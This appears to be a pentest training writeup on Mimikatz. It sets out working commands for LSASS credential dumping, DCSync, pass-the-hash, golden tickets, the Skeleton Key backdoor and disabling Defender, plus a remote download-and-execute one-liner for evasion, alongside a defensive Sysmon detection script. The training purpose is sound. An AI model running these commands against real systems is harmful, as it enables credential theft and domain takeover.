Mimikatz Deep Dive

Level: intermediate | Time: 45 min | Format: Writeup

Mastering the swiss army knife of Windows credentials

Learning Objectives

  • Use Mimikatz modules
  • Dump credentials from memory
  • Perform pass-the-hash/ticket
  • Extract secrets from LSASS

Mimikatz is the Swiss Army knife of Windows credential attacks. Created by Benjamin Delpy (@gentilkiwi), it is the tool that made a whole family of credential attacks, pass-the-hash and pass-the-ticket among them, accessible to everyone. If you do Windows pentesting, you WILL use Mimikatz.

Think of Mimikatz as a master lockpick for Windows security. It exploits how Windows stores and handles credentials in memory - extracting passwords, hashes, tickets, and keys that Windows thought were safely protected.

Heavily Detected

Mimikatz is one of the most signatured tools in existence. Every AV, EDR, and security product looks for it: the binary, its strings, its PowerShell wrapper, and the LSASS handle it opens. Running the stock binary rarely survives on a monitored host, but the techniques (and re-implementations of them) still work.
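
What "every EDR looks for it" means in practice is mostly one telemetry source: a handle opened on lsass.exe with read rights by an unexpected process. The script below is an added example, not code from the original page, that runs that rule over Sysmon Event ID 10 (ProcessAccess) records. It assumes Sysmon is installed with a rule that logs lsass.exe as TargetImage; the log name and field names are Sysmon's own, while the allow-list, the access-mask logic and the sample records are this example's choices and need tuning per environment.

```powershell
# Added example: detect credential-theft style handles on lsass.exe (Sysmon Event 10).
# Assumes Sysmon logs ProcessAccess with TargetImage lsass.exe. Allow-list is illustrative.

# Source images that legitimately touch lsass on most hosts (example list; an AV
# engine, the WMI provider host and Task Manager usually belong here as well)
$AllowedLsassReaders = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe'
)

function Test-SuspiciousLsassAccess {
    # Returns a reason string when the access looks like credential theft, else $null
    param(
        [Parameter(Mandatory)][string]$SourceImage,
        [Parameter(Mandatory)][string]$TargetImage,
        [Parameter(Mandatory)][uint32]$GrantedAccess,
        [string]$CallTrace = ''
    )
    if ($TargetImage -notmatch '\\lsass\.exe$') { return $null }

    $reasons = @()
    if ($AllowedLsassReaders -notcontains $SourceImage) {
        if ($GrantedAccess -eq 0x1FFFFF) {
            # PROCESS_ALL_ACCESS: what procdump and Task Manager dumps ask for
            $reasons += 'PROCESS_ALL_ACCESS on lsass'
        } elseif (($GrantedAccess -band 0x10) -ne 0) {
            # PROCESS_VM_READ is the one right a credential reader cannot do without;
            # mimikatz-style readers typically show up as 0x1010 or 0x1410
            $reasons += ('PROCESS_VM_READ on lsass (0x{0:X})' -f $GrantedAccess)
        }
    }
    # A frame in unbacked memory means the caller is injected or reflectively loaded code
    if ($CallTrace -match 'UNKNOWN') {
        $reasons += 'call trace has a frame in unbacked memory (UNKNOWN)'
    }
    if ($reasons.Count -eq 0) { return $null }
    return ($reasons -join '; ')
}

function Get-LsassAccessAlerts {
    # Pull recent Sysmon ProcessAccess events from the live log and run the rule over them
    param([int]$MaxEvents = 1000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop | ForEach-Object {
        $fields = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
        $p = @{
            SourceImage   = $fields.SourceImage
            TargetImage   = $fields.TargetImage
            GrantedAccess = [uint32]$fields.GrantedAccess   # Sysmon writes it as "0x1010"
            CallTrace     = [string]$fields.CallTrace
        }
        $reason = Test-SuspiciousLsassAccess @p
        if ($reason) {
            [pscustomobject]@{ Time = $_.TimeCreated; Source = $fields.SourceImage; Reason = $reason }
        }
    }
}

# Constructed sample records (not real log data) so the rule can be exercised offline
$Samples = @(
    @{ SourceImage = 'C:\Windows\System32\svchost.exe'; TargetImage = 'C:\Windows\system32\lsass.exe'
       GrantedAccess = '0x1000'; CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4e4' }
    @{ SourceImage = 'C:\Users\bob\Desktop\mimikatz.exe'; TargetImage = 'C:\Windows\system32\lsass.exe'
       GrantedAccess = '0x1010'; CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\KERNELBASE.dll+2d55e' }
    @{ SourceImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; TargetImage = 'C:\Windows\system32\lsass.exe'
       GrantedAccess = '0x1410'; CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4e4|UNKNOWN(000001D4C0A20000)' }
    @{ SourceImage = 'C:\Tools\procdump64.exe'; TargetImage = 'C:\Windows\system32\lsass.exe'
       GrantedAccess = '0x1FFFFF'; CallTrace = 'C:\Windows\SYSTEM32\ntdll.dll+9d4e4' }
)

foreach ($s in $Samples) {
    $r = Test-SuspiciousLsassAccess -SourceImage $s.SourceImage -TargetImage $s.TargetImage `
                                     -GrantedAccess ([uint32]$s.GrantedAccess) -CallTrace $s.CallTrace
    '{0,-65} {1}' -f $s.SourceImage, $(if ($r) { "ALERT: $r" } else { 'ok' })
}
```

On the constructed samples the svchost record passes (allow-listed, and 0x1000 is query-only), while the mimikatz, the injected PowerShell and the procdump records all alert. Call `Get-LsassAccessAlerts` on a host that actually has Sysmon to run the same rule over the real log; expect to extend the allow-list before it is quiet.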

Running Mimikatz

# Basic execution (interactive console)
mimikatz.exe

# Run commands directly and exit
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# Elevated privileges required for most functions:
# start as a local admin, then enable SeDebugPrivilege in the console
privilege::debug

# Log output to file
log output.txt
sekurlsa::logonpasswords
log /stop                 # Stop logging

# Common issues:
# "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)"
# = not running as admin/SYSTEM, or privilege::debug was skipped
# = LSA Protection (RunAsPPL) is on: LSASS is a protected process and
#   refuses the handle from user mode
# With Credential Guard the handle is granted but the NTLM hashes and
# Kerberos keys are simply not in LSASS (they live in the isolated
# LSAIso process), so the output has no usable secrets

Evasion Techniques

# Invoke-Mimikatz (PowerShell, reflective in-memory load; AMSI and
# script block logging still see it unless bypassed first)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# pypykatz (pure-Python implementation, parses a dump on your own machine)
pypykatz lsa minidump lsass.dmp

# Mimikatz itself can parse an LSASS minidump offline (avoid running on target)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# Other options:
# Safe Mode boot (many AV/EDR services do not start there)
# ProcDump (signed Sysinternals binary) to dump LSASS, then offline analysis
# Note: a dump from a Credential Guard host contains no secrets either way

sekurlsa Module - Credential Extraction

# Most important module - extracts credentials from LSASS

# All credentials (passwords, hashes, tickets)
sekurlsa::logonpasswords

# Output includes one block per logon session:
Authentication Id : 0 ; 12345
Session           : Interactive from 1
User Name         : Administrator
Domain            : CORP
Logon Server      : DC01
Logon Time        : 12/1/2024 9:00:00 AM
SID               : S-1-5-21-...-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CORP
         * NTLM     : a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx    <-- usable directly for pass-the-hash
         * SHA1     : abc123...
        tspkg :
         * Username : Administrator
         * Domain   : CORP
         * Password : SuperSecret123!   <-- Plaintext on older systems!
        wdigest :
         * Username : Administrator
         * Domain   : CORP
         * Password : (null)            <-- Caching off by default since 8.1 / 2012 R2 (and with KB2871997)
        kerberos :
         * Username : Administrator
         * Domain   : CORP.LOCAL
         * Password : (null)            <-- Or plaintext if cached

Specific Extraction Commands

# Just NTLM hashes
sekurlsa::msv

# Kerberos tickets
sekurlsa::tickets
sekurlsa::tickets /export      # Save .kirbi files to the current directory

# WDigest passwords (if enabled)
sekurlsa::wdigest

# SSP credentials
sekurlsa::ssp

# LiveSSP
sekurlsa::livessp

# TsPkg (Terminal Services)
sekurlsa::tspkg

# Kerberos encryption keys (AES keys: use with /aes256: for stealthier PtH)
sekurlsa::ekeys

# Switch (or re-initialise) the LSASS process context, e.g. after
# loading a different minidump; it takes no /pid argument
sekurlsa::process

WDigest Password Trick

WDigest keeps plaintext passwords in LSASS memory for interactive logons. Windows 8.1 / Server 2012 R2 turned that caching off by default, and KB2871997 backported the switch to older builds. The switch is the registry value HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: on older builds without the patch, or anywhere an attacker (or an admin) has set UseLogonCredential=1, you get plaintext passwords. Setting the value only affects logons that happen after it is set, so an attacker who flips it has to wait for, or trigger, a fresh logon.

lsadump Module - Local Credentials

# SAM database (local accounts) - needs SYSTEM: run token::elevate first
lsadump::sam

# Output:
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx

# From offline SAM/SYSTEM hive files (reg save, VSS copy, etc.)
lsadump::sam /sam:SAM /system:SYSTEM

# LSA secrets (service account passwords, auto-logon, etc.)
lsadump::secrets

# Output may include:
# DefaultPassword   (auto-logon password)
# _SC_ServiceName   (service account passwords, plaintext)
# NL$KM             (key that encrypts the cached domain logons below)
# DPAPI_SYSTEM      (machine and user DPAPI system keys)

# Domain cached credentials (DCC2 / MS Cache v2: PBKDF2 over the NTLM hash,
# salted with the lowercased username, 10240 iterations by default)
lsadump::cache
# Format: $DCC2$10240#user#hash
# Crack with hashcat -m 2100 (slow: not reusable for pass-the-hash)

DCSync Attack

# Replicate credentials from a DC over DRSUAPI (requires DCSync rights:
# the Replicating Directory Changes / Changes All permissions on the domain
# object, which Domain Admins and DC computer accounts have by default)
lsadump::dcsync /user:Administrator
lsadump::dcsync /user:krbtgt        # For Golden Tickets!
lsadump::dcsync /all /csv           # All users, CSV format
# (add /domain:corp.local when the host is not joined to the target domain)
# Detection: event 4662 carrying the replication control-access GUIDs from a
# source that is not a domain controller

# Running on the DC itself (with DA access)
lsadump::lsa /inject                # Inject into LSASS, dump every account's hashes (krbtgt included)
lsadump::lsa /patch                 # Patch samsrv in LSASS instead of injecting

kerberos Module - Ticket Attacks

# List cached tickets
kerberos::list

# Purge all tickets (clear cache)
kerberos::purge

# Pass-the-Ticket (inject ticket into the current logon session)
kerberos::ptt ticket.kirbi
kerberos::ptt C:\tickets\*.kirbi    # All tickets in folder

# Golden Ticket creation (forged TGT signed with the krbtgt hash;
# /sid is the domain SID without the RID)
kerberos::golden /user:Administrator /domain:corp.local \
  /sid:S-1-5-21-... /krbtgt:HASH /ptt

# Silver Ticket creation (forged service ticket signed with the
# service account's hash; never touches the DC)
kerberos::golden /user:Administrator /domain:corp.local \
  /sid:S-1-5-21-... /target:dc.corp.local /service:cifs \
  /rc4:SERVICE_HASH /ptt

Pass-the-Hash with Mimikatz

# Spawn a process whose logon session carries the supplied hash
sekurlsa::pth /user:Administrator /domain:corp.local \
  /ntlm:a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx /run:cmd.exe

# Opens a new cmd.exe. The local token is still yours (whoami shows the
# original user), but any network authentication from that window uses
# Administrator's hash: NTLM directly, or Kerberos via a TGT obtained with
# the RC4 key (over-pass-the-hash). Test it with a network action, e.g.
# dir \\dc01\c$, not with whoami.

# Options:
/user:    - Username
/domain:  - Domain (the computer name, or ., for a local account)
/ntlm:    - NTLM hash
/aes256:  - AES256 key (Kerberos only, no RC4 downgrade: stealthier)
/run:     - Program to execute (default: cmd.exe)

# Common uses
sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:"mstsc.exe /v:target"   # RDP with a hash needs Restricted Admin mode on the target
sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:powershell.exe

dpapi Module - DPAPI Secrets

# DPAPI (Data Protection API) protects:
# - Chrome/Edge saved passwords
# - Credential Manager entries
# - RDP saved credentials
# - Various application secrets

# Decrypt a user master key (file lives under
# %APPDATA%\Microsoft\Protect\<SID>\<GUID>) with the user's password
dpapi::masterkey /in:masterkey /sid:S-1-5-21-...-1001 /password:UserPassword

# Or ask the DC to unwrap it with the domain backup key over RPC (DA required)
dpapi::masterkey /in:masterkey /rpc

# Decrypt Chrome passwords (/unprotect uses CryptUnprotectData in the
# current user context, so run this as the user who owns the profile)
dpapi::chrome /in:"Login Data" /unprotect

# Decrypt a Credential Manager blob with an already-decrypted master key
dpapi::cred /in:credential_blob /masterkey:KEY

# Extract the domain backup key (decrypts every user master key in the
# domain, and it never rotates; run against a DC)
lsadump::backupkeys /export

vault & crypto Modules

# Vault - Windows Credential Manager
vault::list                          # List vaults
vault::cred                          # Extract credentials

# Crypto - Certificates and keys
crypto::capi                         # Patch CryptoAPI so non-exportable keys export
crypto::cng                          # Patch CNG (KeyIso service) the same way
crypto::certificates /export         # Export certificates (+ private keys if patched)

# Full sequence to export private keys marked non-exportable:
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /export /systemstore:LOCAL_MACHINE   # default store is CURRENT_USER

Other Useful Modules

# token - Token manipulation
token::list                          # List tokens
token::elevate                       # Impersonate SYSTEM
token::elevate /domainadmin          # Find and impersonate a DA token on this host
token::revert                        # Revert to original token

# process - Process manipulation
process::list                        # List processes
process::suspend /pid:1234           # Suspend process

# service - Service manipulation (service name is a positional argument)
service::list                        # List services
service::stop WinDefend              # Stop the Defender service (Tamper Protection blocks this)
service::remove malware              # Remove service

# net - Network information
net::user                            # Domain users
net::group                           # Domain groups
net::alias                           # Local groups (aliases)

# misc - Miscellaneous
misc::memssp                         # Inject an SSP into LSASS that logs passwords of new logons to C:\Windows\System32\mimilsa.log
misc::skeleton                       # Skeleton Key attack

Skeleton Key Attack

# Patches the authentication code in LSASS on a DC so a second, master
# password is accepted for every account
# Any user can authenticate with "mimikatz" as password
# Original passwords still work

privilege::debug
misc::skeleton

# Now you can:
# - Log in as anyone with password "mimikatz"
# - Original passwords still work, so nobody notices
# - Persists until the DC reboots (no disk artefact)

# Detection:
# - LSASS anomalies on the DC (patched code, unexpected module)
# - Event ID 4673 (sensitive privilege use: SeDebugPrivilege against LSASS)
# - Memory forensics of the DC

# Limitations:
# - Requires DA access on the DC (and no LSA Protection there)
# - Only affects that DC (do all DCs for full coverage)
# - Gone after reboot

Aggressive Technique

Skeleton Key modifies LSASS memory on the DC. It's detectable and could cause stability issues. Use only when persistence is critical and you understand the risks.

Defenses Against Mimikatz

Modern Protections:
├── Credential Guard
│   └── Keeps NTLM hashes, Kerberos keys and TGTs in the VBS-isolated LSAIso process; LSASS holds only handles, so a dump yields nothing
│   └── Check: Get-ComputerInfo | Select DeviceGuardSecurityServicesRunning  (lists CredentialGuard when on)
├── LSA Protection (RunAsPPL)
│   └── LSASS runs as a Protected Process Light: no user-mode handle with read access, even with SeDebugPrivilege
│   └── Check: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
├── Disable WDigest
│   └── No plaintext passwords in memory
│   └── Check: reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential (should be 0 or missing)
└── Protected Users group
    └── No NTLM, no RC4/DES Kerberos, no delegation, no cached logon, TGT lifetime 4 hours

Bypasses exist but require:
- A kernel driver (mimikatz's own mimidrv.sys strips the PPL flag, but loading it means a signed driver load that every EDR watches)
- Exploiting a vulnerable signed driver (BYOVD) to do the same
- Offline attacks (dump LSASS by other means, analyse elsewhere): this avoids running mimikatz on the host, it does not defeat Credential Guard, because the secrets are not in the dump

Mimikatz Methodology

Credential Extraction Flow

1. Elevate: run as admin, then privilege::debug
2. Extract: sekurlsa::logonpasswords for everything
3. Save: export tickets and hashes for later use
4. Lateral: pass-the-hash / pass-the-ticket to new targets
5. Escalate: DCSync if possible, or find a DA session
6. Persist: Golden Ticket for long-term access

Knowledge Check

Quick Quiz

What privilege must be enabled before most Mimikatz operations?

Challenges

Full Credential Harvest

Challenge (intermediate)

On a compromised Windows machine with admin access, extract: NTLM hashes, Kerberos tickets, and any cached domain credentials.


Key Takeaways

  • Mimikatz extracts credentials from Windows memory
  • sekurlsa::logonpasswords is the primary extraction command
  • lsadump handles SAM, secrets, cache, and DCSync
  • kerberos module creates Golden/Silver tickets
  • Credential Guard moves the secrets out of LSASS into LSAIso; LSA Protection (RunAsPPL) blocks the handle
  • Heavily signatured - use alternatives or evasion